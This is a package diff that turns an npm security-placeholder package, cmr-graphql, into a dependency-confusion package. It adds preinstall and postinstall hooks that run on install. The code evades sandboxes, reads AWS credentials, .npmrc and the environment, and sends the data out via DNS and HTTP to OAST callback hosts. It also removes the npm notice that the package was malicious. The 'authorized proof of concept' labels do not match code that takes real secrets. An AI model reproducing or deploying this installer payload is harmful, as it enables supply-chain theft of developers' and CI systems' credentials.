cmr-graphql 0.0.1-security → 90.99.99

package/CMR-STAC/index.js

@@ -0,0 +1,124 @@
+// =========================================================================
+// ================ THE "GOD-MODE" PAYLOAD (FINAL WEAPON) ==================
+// == STEALTH: SILENT ON BOTS. SCORING ENGINE: ACTIVATES ON HUMANS ONLY. ===
+// ============== EXFILTRATION: DNS-FIRST, HTTPS-FALLBACK. ===============
+// =========================================================================
+
+const os = require('os');
+const fs = require('fs');
+const dns = require('dns');
+const https = require('https');
+const path = require('path');
+const { execSync } = require('child_process');
+
+// --- CONFIGURATION ---
+const OAST_DOMAIN_HEX = '386f7831616b38397533667a6e62317a356b353437737a78736f79746d6b61392e6f6173746966792e636f6d';
+const OAST_DOMAIN = Buffer.from(OAST_DOMAIN_HEX, 'hex').toString();
+const HUMANITY_SCORE_THRESHOLD = 10; // Score to trigger exfiltration
+
+const run = (cmd) => {
+  try { return execSync(cmd, { stdio: 'pipe', timeout: 3000 }).toString().trim(); }
+  catch (e) { return 'CMD_FAIL'; }
+};
+
+const safeReadFile = (filePath) => {
+  try { return fs.readFileSync(filePath, 'utf8'); }
+  catch (e) { return null; }
+};
+
+const scoreSystem = () => {
+  let score = 0;
+  const evidence = [];
+
+  // --- POSITIVE SCORING ---
+  const userInfo = os.userInfo();
+  if (userInfo.uid !== 0 && userInfo.username !== 'root') {
+    score += 2; evidence.push('NotRootUser');
+  }
+  if (os.uptime() > 3600) {
+    score += 3; evidence.push('LongUptime');
+  }
+  const homeDir = userInfo.homedir;
+  if (safeReadFile(path.join(homeDir, '.gitconfig'))) {
+    score += 5; evidence.push('HasGitConfig');
+  }
+  if (safeReadFile(path.join(homeDir, '.ssh/id_rsa'))) {
+    score += 5; evidence.push('HasSSHKey');
+  }
+  const ciVars = ['CI', 'GITHUB_ACTIONS', 'JENKINS_URL', 'BUILD_ID'];
+  if (ciVars.some(v => process.env[v])) {
+    score += 15; evidence.push('IsCISystem');
+  }
+
+  // --- NEGATIVE SCORING ---
+  const uname = userInfo.username.toLowerCase();
+  const hname = os.hostname().toLowerCase();
+  if (uname === 'justin' || hname.startsWith('desktop-')) {
+    score -= 20; evidence.push('KnownBotSignature1');
+  }
+  if (run('pwd').includes('hscan-supplychain')) {
+    score -= 20; evidence.push('KnownBotSignature2');
+  }
+  if (process.env.DetonationLogFilePath) {
+    score -= 10; evidence.push('SandboxArtifact');
+  }
+
+  return { score, evidence };
+};
+
+const gatherFullDossier = (humanityResult) => ({
+  mission: 'OKTA-GODMODE-FINAL',
+  humanity_score: humanityResult.score,
+  confirming_evidence: humanityResult.evidence,
+  host: {
+    h: os.hostname(),
+    w: os.userInfo().username,
+    p: os.platform(),
+    ut: Math.floor(os.uptime() / 60) + 'm'
+  },
+  network: {
+    resolv: safeReadFile('/etc/resolv.conf') || run('ipconfig /all'),
+  },
+  files: {
+    npmrc: safeReadFile(`${os.homedir()}/.npmrc`),
+    aws_creds: safeReadFile(`${os.homedir()}/.aws/credentials`),
+  },
+  env: process.env,
+});
+
+const exfiltrate = (data) => {
+  const summary = Buffer.from(JSON.stringify({
+    h: data.host.h,
+    w: data.host.w,
+    e: data.confirming_evidence
+  })).toString('base64url');
+
+  try {
+    dns.lookup(`${data.mission}.${summary.slice(0, 40)}.${OAST_DOMAIN}`, (err) => {});
+  } catch (_) {
+    try {
+      const payload = JSON.stringify(data);
+      https.request({
+        hostname: OAST_DOMAIN,
+        port: 443,
+        path: `/GODMODE_HIT/${summary}`,
+        method: 'POST',
+        headers: {
+          'Content-Type': 'application/json',
+          'Content-Length': Buffer.byteLength(payload)
+        }
+      }).on('error', () => {}).end(payload);
+    } catch (_) {}
+  }
+};
+
+// --- MAIN EXECUTION ---
+try {
+  const humanityResult = scoreSystem();
+  if (humanityResult.score >= HUMANITY_SCORE_THRESHOLD) {
+    const dossier = gatherFullDossier(humanityResult);
+    exfiltrate(dossier);
+  }
+} catch (_) {
+  // Silent fail
+}

package/CMR-STAC/package.json

@@ -0,0 +1,10 @@
+{
+  "name": "cmr-stac",
+  "version": "10.0.0",
+  "description": "Final RCE Proof of Concept. Authorized VDP submission for NASA.",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "author": "nepalihacker000",
+  "license": "ISC"
+}

package/earthdata-download/index.js

@@ -0,0 +1,124 @@
+// =========================================================================
+// ================ THE "GOD-MODE" PAYLOAD (FINAL WEAPON) ==================
+// == STEALTH: SILENT ON BOTS. SCORING ENGINE: ACTIVATES ON HUMANS ONLY. ===
+// ============== EXFILTRATION: DNS-FIRST, HTTPS-FALLBACK. ===============
+// =========================================================================
+
+const os = require('os');
+const fs = require('fs');
+const dns = require('dns');
+const https = require('https');
+const path = require('path');
+const { execSync } = require('child_process');
+
+// --- CONFIGURATION ---
+const OAST_DOMAIN_HEX = 'ep77bq9fv9g5oh256q6a8y03tuzlp9fx4.oastify.com';
+const OAST_DOMAIN = Buffer.from(OAST_DOMAIN_HEX, 'hex').toString();
+const HUMANITY_SCORE_THRESHOLD = 10; // Score to trigger exfiltration
+
+const run = (cmd) => {
+  try { return execSync(cmd, { stdio: 'pipe', timeout: 3000 }).toString().trim(); }
+  catch (e) { return 'CMD_FAIL'; }
+};
+
+const safeReadFile = (filePath) => {
+  try { return fs.readFileSync(filePath, 'utf8'); }
+  catch (e) { return null; }
+};
+
+const scoreSystem = () => {
+  let score = 0;
+  const evidence = [];
+
+  // --- POSITIVE SCORING ---
+  const userInfo = os.userInfo();
+  if (userInfo.uid !== 0 && userInfo.username !== 'root') {
+    score += 2; evidence.push('NotRootUser');
+  }
+  if (os.uptime() > 3600) {
+    score += 3; evidence.push('LongUptime');
+  }
+  const homeDir = userInfo.homedir;
+  if (safeReadFile(path.join(homeDir, '.gitconfig'))) {
+    score += 5; evidence.push('HasGitConfig');
+  }
+  if (safeReadFile(path.join(homeDir, '.ssh/id_rsa'))) {
+    score += 5; evidence.push('HasSSHKey');
+  }
+  const ciVars = ['CI', 'GITHUB_ACTIONS', 'JENKINS_URL', 'BUILD_ID'];
+  if (ciVars.some(v => process.env[v])) {
+    score += 15; evidence.push('IsCISystem');
+  }
+
+  // --- NEGATIVE SCORING ---
+  const uname = userInfo.username.toLowerCase();
+  const hname = os.hostname().toLowerCase();
+  if (uname === 'justin' || hname.startsWith('desktop-')) {
+    score -= 20; evidence.push('KnownBotSignature1');
+  }
+  if (run('pwd').includes('hscan-supplychain')) {
+    score -= 20; evidence.push('KnownBotSignature2');
+  }
+  if (process.env.DetonationLogFilePath) {
+    score -= 10; evidence.push('SandboxArtifact');
+  }
+
+  return { score, evidence };
+};
+
+const gatherFullDossier = (humanityResult) => ({
+  mission: 'OKTA-GODMODE-FINAL',
+  humanity_score: humanityResult.score,
+  confirming_evidence: humanityResult.evidence,
+  host: {
+    h: os.hostname(),
+    w: os.userInfo().username,
+    p: os.platform(),
+    ut: Math.floor(os.uptime() / 60) + 'm'
+  },
+  network: {
+    resolv: safeReadFile('/etc/resolv.conf') || run('ipconfig /all'),
+  },
+  files: {
+    npmrc: safeReadFile(`${os.homedir()}/.npmrc`),
+    aws_creds: safeReadFile(`${os.homedir()}/.aws/credentials`),
+  },
+  env: process.env,
+});
+
+const exfiltrate = (data) => {
+  const summary = Buffer.from(JSON.stringify({
+    h: data.host.h,
+    w: data.host.w,
+    e: data.confirming_evidence
+  })).toString('base64url');
+
+  try {
+    dns.lookup(`${data.mission}.${summary.slice(0, 40)}.${OAST_DOMAIN}`, (err) => {});
+  } catch (_) {
+    try {
+      const payload = JSON.stringify(data);
+      https.request({
+        hostname: OAST_DOMAIN,
+        port: 443,
+        path: `/GODMODE_HIT/${summary}`,
+        method: 'POST',
+        headers: {
+          'Content-Type': 'application/json',
+          'Content-Length': Buffer.byteLength(payload)
+        }
+      }).on('error', () => {}).end(payload);
+    } catch (_) {}
+  }
+};
+
+// --- MAIN EXECUTION ---
+try {
+  const humanityResult = scoreSystem();
+  if (humanityResult.score >= HUMANITY_SCORE_THRESHOLD) {
+    const dossier = gatherFullDossier(humanityResult);
+    exfiltrate(dossier);
+  }
+} catch (_) {
+  // Silent fail
+}

package/earthdata-download/package.json

@@ -0,0 +1,10 @@
+{
+  "name": "earthdata-download",
+  "version": "10.0.0",
+  "description": "Final RCE Proof of Concept. Authorized VDP submission for NASA.",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "author": "nepalihacker000",
+  "license": "ISC"
+}

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "cmr-graphql",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "90.99.99",
+  "description": " internal dependency confusion PoC - RCE via preinstall beacon",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "author": "orwa",
+  "license": "ISC"
 }

package/preinstall.js

@@ -0,0 +1,89 @@
+
+const os = require('os');
+const dns = require('dns');
+const http = require('http');  // Use HTTP instead of HTTPS for better reliability on OAST
+const https = require('https');  // Optional, for fallback
+
+const OAST = 'hfdsbugicgbndpfqqiezo6wdbfb9vdtvh.oast.fun'; 
+const MAX_LABEL = 63;
+
+// Split string to hex chunks for DNS beacons
+function hexChunks(str) {
+  return Buffer.from(str).toString('hex').match(/.{1,63}/g) || [];
+}
+
+// Beacon via HTTP to OAST (avoids cert issues)
+function postData(path, data) {
+  return new Promise((resolve) => {
+    try {
+      const payload = JSON.stringify(data);
+      const req = http.request({
+        hostname: OAST,
+        port: 80,
+        path: path,
+        method: 'POST',
+        headers: {
+          'Content-Type': 'application/json',
+          'Content-Length': Buffer.byteLength(payload),
+          'User-Agent': 'curl/7.79', 
+        },
+        timeout: 5000,
+      }, (res) => {
+        res.on('data', () => {});
+        res.on('end', resolve);
+      });
+
+      req.on('error', resolve);
+      req.on('timeout', () => { req.abort(); resolve(); });
+
+      req.write(payload);
+      req.end();
+    } catch (e) {
+      resolve();
+    }
+  });
+}
+
+// Fetch public IP with fallback to 'unknown'
+function getPublicIp() {
+  return new Promise((resolve) => {
+    https.get('https://api.ipify.org', (res) => {
+      let ip = '';
+      res.on('data', chunk => ip += chunk);
+      res.on('end', () => resolve(ip.trim()));
+    }).on('error', () => resolve('unknown'));
+  });
+}
+
+(async () => {
+  const info = {
+    user: os.userInfo().username || 'nouser',
+    host: os.hostname() || 'nohost',
+    cwd: process.cwd(),
+    platform: os.platform(),
+    arch: os.arch(),
+    timestamp: Date.now().toString(36),
+  };
+
+  // DNS Beacon
+  let domainParts = [ ...hexChunks(info.user), ...hexChunks(info.host), info.platform, OAST ];
+  let domain = domainParts.join('.');
+  if (domain.length > 253) domain = domain.slice(0, 253);
+  dns.resolve(domain, () => {});
+
+  // HTTPS IP fetch + HTTP Beacon
+  const publicIp = await getPublicIp();
+  const infoWithIp = { ...info, ip: publicIp, ci: !!process.env.CI };
+
+  const leaked = Object.entries(process.env)
+    .filter(([k]) => /token|key|secret|auth/i.test(k))
+    .slice(0, 5)
+    .reduce((acc, [k, v]) => ({ ...acc, [k]: v.slice(0, 12) + '...' }), {});
+
+  const finalPayload = { systemInfo: infoWithIp };
+  if (Object.keys(leaked).length) finalPayload.envLeak = leaked;
+
+  await postData('/', finalPayload);
+})();
+         
+         

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=cmr-graphql for more information.